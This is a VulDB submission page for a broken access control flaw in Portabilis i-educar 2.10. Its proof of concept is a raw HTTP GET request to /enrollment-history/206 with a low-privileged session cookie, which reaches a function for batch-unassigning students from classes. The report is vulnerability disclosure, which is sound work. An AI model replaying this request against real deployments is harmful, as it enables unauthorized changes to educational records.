Submit #649876: Portabilis i-educar 2.10 Broken Access Controlinfo

TitelPortabilis i-educar 2.10 Broken Access Control
Beschreibung# Broken Access Control in `/enrollment-history/[ID]` Endpoint --- ## Summary A **Broken Access Control** vulnerability was identified in the `/enrollment-history/[ID]` endpoint of the _i-educar_ application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks. --- ## Details **Vulnerable Endpoint:** `GET /enrollment-history/[ID]` **Authentication:** Required The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for . --- ## PoC 1. Authenticate as a non-privileged user. <img width="1439" height="663" alt="Pasted image 20250905173645" src="https://github.com/user-attachments/assets/335886ad-844c-493f-8573-43e98ac14627" /> <img width="936" height="436" alt="Pasted image 20250821191019" src="https://github.com/user-attachments/assets/e28f96f7-eece-4508-8ee1-f0fd1f4ac074" /> 2. Send the following request:: ``` GET /enrollment-history/206 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Connection: keep-alive Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206 Cookie: i_educar_session=[low_privileged cookie] Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=0, i ``` 3. We could observe that we have access to the page and to the function to batch unassign students from classes. And, this user, should not do that. <img width="1617" height="702" alt="Pasted image 20250905181121" src="https://github.com/user-attachments/assets/75f7cfad-f7a5-4894-8cfc-ff002be8b5e4" /> --- ## Impact Broken Access Control vulnerabilities can have severe consequences, including: - Unauthorized access to restricted functionality - Escalation of privileges for low-level users - Exposure of sensitive data and potential system compromise - Loss of confidentiality and integrity of educational records - Reputational damage to the organization
Quelle⚠️ https://github.com/marcelomulder/CVE/blob/main/i-educar/Broken%20Access%20Control%20Vulnerability%20%20in%20%60.enrollment-history.(ID)%60%20Endpoint.md
Benutzer
 marceloQz (UID 87549)
Einreichung07.09.2025 16:43 (vor 9 Monaten)
Moderieren17.09.2025 09:04 (10 days later)
StatusAkzeptiert
VulDB Eintrag324628 [Portabilis i-Educar bis 2.10 /enrollment-history/ erweiterte Rechte]
Punkte20

ZurückÜbersichtWeiter

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!